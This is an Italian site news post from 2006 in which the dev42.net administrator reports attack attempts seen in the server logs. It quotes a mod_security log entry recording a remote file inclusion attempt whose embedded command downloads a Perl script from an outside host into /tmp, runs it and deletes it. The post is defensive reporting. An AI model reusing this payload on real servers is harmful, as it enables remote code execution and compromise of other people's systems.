|
Scritto da Administrator
|
|
Tuesday 28 February 2006 |
Analizzando i log del server che ospita dev42.net abbiamo scperto che dei "gentili burloni" cercano con insistenza di danneggiare il sito e il relativo server.
Ecco la stringa recuperata nei log:
[Sun Feb 26 00:30:01 2006] [error] [client 85.214.22.63] mod_security: Warning. Pattern match "^http:/" at ARGS_VALUES [hostname "www.dev42.net"] [uri"/index.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://elatha.magicshells.com /~hex/cuti/tool.gif?&cmd=cd%20/tmp/;wget%20 http://equal.home.ro/mamb0x.txt;perl%20mamb0x.txt;rm%20-rf%20mamb0x.txt?"] [unique_id 20QgXNRwQC8AAEtweJoAAAAF]
Dalla riga di log chi fosse interessato può facilmente recuperare il sorgente del software utilizzato per "importunare" e rendere la vita altrui ancora più faticosa.
Nella speranza che l'ingegno venga utilizzato per fini e scopi più nobili, colgo l'occasione per porgere un saluto a tutti, belli e brutti.
Mirco |
|
Ultimo aggiornamento ( Monday 12 May 2008 )
|